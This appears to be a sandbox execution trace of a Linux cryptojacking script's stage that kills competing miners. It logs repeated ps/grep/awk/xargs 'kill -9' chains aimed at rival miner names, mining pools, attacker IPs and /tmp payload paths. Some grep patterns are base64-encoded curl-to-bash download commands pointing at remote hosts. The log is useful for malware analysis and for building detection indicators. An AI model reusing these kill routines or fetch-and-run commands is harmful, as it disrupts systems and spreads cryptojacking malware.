[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :3389]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :5555]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :6666]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :6665]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :6667]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :7777]

/bin/grep

[grep :8444]

/usr/bin/awk

[awk -F[/] {print $1}]

/bin/grep

[grep -v -]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $7}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :3347]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :10008]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep :13531]

/bin/grep

[grep -v grep]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep :3333]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep :5555]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep kworker -c\]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep log_]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep systemten]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep netns]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/kill

[kill -9 10]

/usr/local/bin/kill

[kill -9 10]

/usr/sbin/kill

[kill -9 10]

/usr/bin/kill

[kill -9 10]

/sbin/kill

[kill -9 10]

/bin/kill

[kill -9 10]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep voltuned]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep darwin]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/dl]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/ddg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/pprt]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/ppol]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/65ccE*]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/jmx*]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/2Ne80*]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep IOFoqIgyC0zmf2UR]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 45.76.122.92]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 51.38.191.178]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 51.15.56.161]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 86s.jpg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep aGTSGJJp]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep nMrfmnRa]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep PuNY5tm2]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep I0r8Jyyt]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep AgdgACUD]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep uiZvwxG8]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep hahwNEdB]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep BtwXn5qH]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 3XEzey2T]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep t2tKrCSZ]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep HD7fcBgg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep zXcDajSs]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 3lmigMo]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep AkMK4A2]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep AJ2AkKe]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep HiPxCJRS]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC030]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC031]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC032]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC033]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep C4iLM4L]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep aziplcr72qjhzvin]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk { if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /boot/vmlinuz]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep i4b503a52cc5]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep dgqtrcst23rtdi3ldqk322j2]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 2g0uv7npuhrlatd]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep nqscheduler]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep rkebbwgqpl4npmm]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep -v aux]

/usr/bin/awk

[awk $3>10.0{print $2}]

/bin/grep

[grep -v grep]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/ps

[ps aux]

/bin/grep

[grep ]]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 2fhtu70teuhtoh78jc5s]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 0kwti6ut420t]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 44ct7udt0patws3agkdfqnjm]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk length($11)>19{print $2}]

/bin/grep

[grep -v _]

/bin/grep

[grep -v -]

/bin/grep

[grep -v /]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep \[^]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep rsync]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep watchd0g]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep -v grep]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/egrep

[egrep wnTKYg|2t3ik|qW3xT.2|ddg]

/bin/ps

[ps aux]

/usr/local/sbin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/usr/local/bin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/usr/sbin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/usr/bin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/sbin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/bin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 158.69.133.18:8220]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/java]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep gitee.com]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/java]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 104.248.4.162]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 89.35.39.78]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /dev/shm/z3.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep kthrotlds]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep ksoftirqds]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep netdns]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep watchdogs]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep kdevtmpfsi]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep kinsing]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep redis2]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep ps]

/bin/grep

[grep -v aux]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep sync_supers]

/bin/grep

[grep -v grep]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/cut

[cut -c 9-15]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/cut

[cut -c 9-15]

/bin/grep

[grep cpuset]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep x]]

/bin/grep

[grep -v aux]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep sh] <]

/bin/grep

[grep -v aux]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep \[]]

/bin/grep

[grep -v aux]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/l.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/zmcat]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep hahwNEdB]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep CnzFVPLF]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep CvKzzZLs]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep aziplcr72qjhzvin]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/udevd]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep sustse]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep sustse3]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep mr.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep mr.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep 2mr.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep 2mr.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep cr5.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep cr5.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep logo9.jpg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep logo9.jpg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep j2.conf]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep luk-cpu]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep luk-cpu]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep ficov]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep ficov]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep he.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep he.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep miner.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep miner.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep nullcrew]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep nullcrew]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep -v grep]

/usr/bin/awk

[awk {print $2}]

/bin/ps

[ps aux]

/bin/grep

[grep 107.174.47.156]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 83.220.169.247]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 51.38.203.146]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 144.217.45.45]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 107.174.47.181]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 176.31.6.16]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep mine.moneropool.com]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep pool.t00ls.ru]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmr.crypto-pool.fr:8080]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmr.crypto-pool.fr:3333]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep [email protected]]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep monerohash.com]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/a7b104c270]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmr.crypto-pool.fr:6666]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmr.crypto-pool.fr:7777]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmr.crypto-pool.fr:443]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep stratum.f2pool.com:8888]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xmrpool.eu]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep kieuanilam.me]

/bin/grep

[grep -v grep]

/bin/ps

[ps auxf]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xiaoyao]

/bin/ps

[ps auxf]

/usr/local/sbin/kill

[kill -9 1737]

/usr/local/bin/kill

[kill -9 1737]

/usr/sbin/kill

[kill -9 1737]

/usr/bin/kill

[kill -9 1737]

/sbin/kill

[kill -9 1737]

/bin/kill

[kill -9 1737]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep xiaoxue]

/bin/ps

[ps auxf]

/usr/local/sbin/kill

[kill -9 1742]

/usr/local/bin/kill

[kill -9 1742]

/usr/sbin/kill

[kill -9 1742]

/usr/bin/kill

[kill -9 1742]

/sbin/kill

[kill -9 1742]

/bin/kill

[kill -9 1742]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep ESTABLISHED\|SYN_SENT]

/bin/grep

[grep 46.243.253.15]

/bin/sed

[sed -e s/\/.*//g]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/sed

[sed -e s/\/.*//g]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep ESTABLISHED\|SYN_SENT]

/bin/grep

[grep 176.31.6.16]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f L2Jpbi9iYXN]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f xzpauectgr]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f slxfbkmxtd]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f mixtape]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f addnj]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f 200.68.17.196]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/pgrep

[pgrep -f IyEvYmluL3NoCgpzUG]

/usr/bin/xargs

[xargs -I % kill -9 %]

